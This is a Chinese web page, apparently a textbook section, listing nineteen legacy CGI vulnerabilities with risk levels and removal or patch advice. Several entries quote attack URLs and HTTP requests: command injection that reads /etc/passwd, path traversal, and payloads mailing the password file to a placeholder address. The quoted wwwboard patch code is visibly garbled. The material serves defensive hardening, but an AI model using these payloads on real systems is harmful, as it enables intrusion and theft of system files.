網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 5.6 CGI漏洞攻擊(1) 5.6 CGI漏洞攻擊以下收集和整理了一些著名的CGI漏洞,并提供了一些安全建議和解決方法,如果服務器存在這些漏洞不及時修補的話,每一個漏洞有可能將會補入侵者利用,加大服務器被攻擊的指數。 1. phf● 類型: 攻擊型 ● 風險等級: 中 ● 描述: 在NCSA 或者 Apache (1.1.1版本以內)非商業版本的Web Server中有一段程序util.c,允許入侵者以root身份執行任何一個指令: http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here ● 解決方法: 把Apache web server升級到1.1.1以上,或者將NCSA web server升級到最新版本。 2. wguset.exe● 類型: 攻擊型 ● 風險等級: 中 ● 描述: 如果使用Windows NT做為WebServer的操作系統,而且wguest.exe存在于Web可執行目錄中的話,入侵者將能利用它閱讀到硬盤上所有USR_<hostname>用戶能閱讀的文件。 ● 解決方法: 將wguset.exe從Web目錄中移走或刪除。 3. rguset.exe● 類型: 攻擊型 ● 風險等級: 中 ● 描述: 如果使用Windows NT做為WebServer的操作系統,而且rguest.exe存在于Web可執行目錄中的話,入侵者將能利用它閱讀到服務器硬盤上所有USR_<hostname>用戶能閱讀的文件。 ● 解決方法: 將rguset.exe從Web目錄中移走或刪除。 4. perl.exe● 類型: 攻擊型 ● 風險等級: 低 ● 描述: 在cgi-bin執行目錄下存在perl.exe,這屬于嚴重的配置錯誤。入侵者可以在perl.exe后面加一串指令,利用瀏覽器在server上執行任何腳本程序。 ● 解決方法: 在Web目錄下移除perl.exe這個程序。 5. shtml.exe● 類型: 攻擊型 ● 風險等級: 低 ● 描述: 如果使用Front Page作為WebServer,那么入侵者能夠利用IUSR_ <lt;hostname>用戶和shtml.exe入侵戶用的機器。 ● 解決方法: 將shtml.exe從Web目錄移走或刪除。 6. wwwboard.pl● 類型: 攻擊型 ● 風險等級: 低 ● 描述: wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊。 ● 建議: 如無必要可以刪除該文件。 ● 解決方法: 將get_variables的子程序中的下面這段: if ($FORM{"followup"}) { $followup = "1" @followup_num = split(/,/,$FORM{"followup"}); $num_followups = @followups = @followup_num; $last_message = pop(@followups); $origdate = "$FORM{"origdate"}" $origname = "$FORM{"origname"}" $origsubject = "$FORM{"origsubject"}" } 替換為: if ($FORM{"followup"}) { $followup = "1" @followup_num = split(/,/,$FORM{"followup"}); $num_followups = @followups = @followup_num; $last_message = pop(@followups); $origdate = "$FORM{"origdate"}" $origname = "$FORM{"origname"}" $origsubject = "$FORM{"origsubject"}" # WWWBoard Bomb Patch # Written By: Samuel Sparling sparling@slip.net) $fn=0; while($fn < $num_followups) { $cur_fup = @followups $fn]; $dfn=0; foreach $fm(@followups) { if(@followups[$dfn] == @followups[$fn] && $dfn != $fn) { &error(board_bomb); } $dfn++; } $fn++; } # End WWWBoard Bomb Patch } 7. uploader.exe● 類型: 攻擊型 ● 風險等級: 中 ● 描述: 如果使用Windows NT作為WebServer的操作系統,入侵者能夠利用uploader.exe上傳任何文件。 ● 解決方法: 將uploader.exe從Web目錄移走或刪除。 8. bdir.htr● 類型: 攻擊型 ● 風險等級: 高 ● 描述: 如果使用Windows NT做為WebServer的操作系統,而且bdir.htr存在于Web可執行目錄中的話,入侵者將能利用它在服務器上無止境的創建ODBC數據庫,并生成一些可執行的文件。 ● 解決方法: 將bdir.htr從Web目錄移走或刪除。 9. Count.cgi● 類型: 攻擊型 ● 風險等級: 高 ● 描述: 在/cgi-bin目錄下的Count.cgi程序(Wwwcount2.3版本)有一個溢出錯誤,允許入侵者無須登錄而遠程執行任何指令。 ● 建議: 如無必要可以刪除該文件。 ● 解決方法: 將Wwwcount升級到2.4或者以上。 10. test-cgi● 類型: 攻擊型 ● 風險等級: 高 ● 描述: test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息。 ● 建議: 建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限。 ● 解決方法: 刪除test-cgi文件。 11. nph-test-cgi● 類型: 攻擊型 ● 風險等級: 高 ● 描述: nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息。 ● 建議: 建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限。 ● 解決方法: 刪除nph-test-cgi文件。 12. php.cgi● 類型: 攻擊型 ● 風險等級: 低 ● 描述: php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系統文件可以被入侵者讀取的漏洞。 ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 刪除php.cgi程序是最好的辦法。 13. handler● 類型: 攻擊型 ● 風險等級: 低 ● 描述: IRIX 5.3、6.2、6.3、6.4的/cgi-bin/handler程序存在緩存溢出錯誤,允許入侵者在server上遠程執行如下程序: telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0 ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 刪除handler文件。 14. webgais● 類型: 攻擊型 ● 風險等級: 高 ● 描述: /cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個漏洞使入侵者可以繞過程序的安全機制,執行系統命令: POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace this with the actual length of the "exploit" line) telnet target.machine.com 80 query="mail+you\@your.host</etc/passwd;echo"&output=subject&domain=paragraph ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 刪除webgais文件。 15. websendmail● 類型: 攻擊型 ● 風險等級: 高 ● 描述: /cgin-bin目錄下的websendmail程序允許入侵者執行一個系統指令: telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the stri ng passed to the server, in this case xxx=90) receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a &subject=a &content=a ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 高級用戶可以編輯websendmail腳本,過濾特殊字符。一般用戶則刪除websendmail文件。 16. webdist.cgi● 類型:攻擊型 ● 風險等級:高 ● 描述:對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點允許入侵者無須登錄而在系統上執行任何指令: http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi。 17. faxsurvey● 類型: 攻擊型 ● 風險等級: 高 ● 描述: 在Linux S.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無須登錄就能在服務器執行指令: http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 刪除/cgi-bin/faxsurvey文件。 18. htmlscript● 類型: 攻擊型 ● 風險等級: 中 ● 描述: 安裝了htmlscript2.99x或者更早版本的服務器,存在一個漏洞使入侵者可以查看服務器上的任何文件: http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到3.0以上。 19. pfdisplay● 類型: 攻擊型 ● 風險等級: 中 ● 描述: 在Irix6.4或者更早版本的Web服務器上,/cgi-bin/pfdisplay程序允許入侵者非法查看服務器上的文件。 ● 建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。 ● 解決方法: 刪除/cgi-bin/pfdisplay文件,或者打補丁程序。 補丁程序可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下載: Filename: README.patch.3018 Algorithm #1 (sum -r): 37955 11 README.patch.3018 Algorithm #2 (sum): 15455 11 README.patch.3018 MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69 Filename: patchSG0003018 Algorithm #1 (sum -r): 01679 2 patchSG0003018 Algorithm #2 (sum): 12876 2 patchSG0003018 MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8 Filename: patchSG0003018.idb Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb Algorithm #2 (sum): 251 2 patchSG0003018.idb MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB Filename: patchSG0003018.performer_tools_man Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29 Filename: patchSG0003018.performer_tools_sw Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!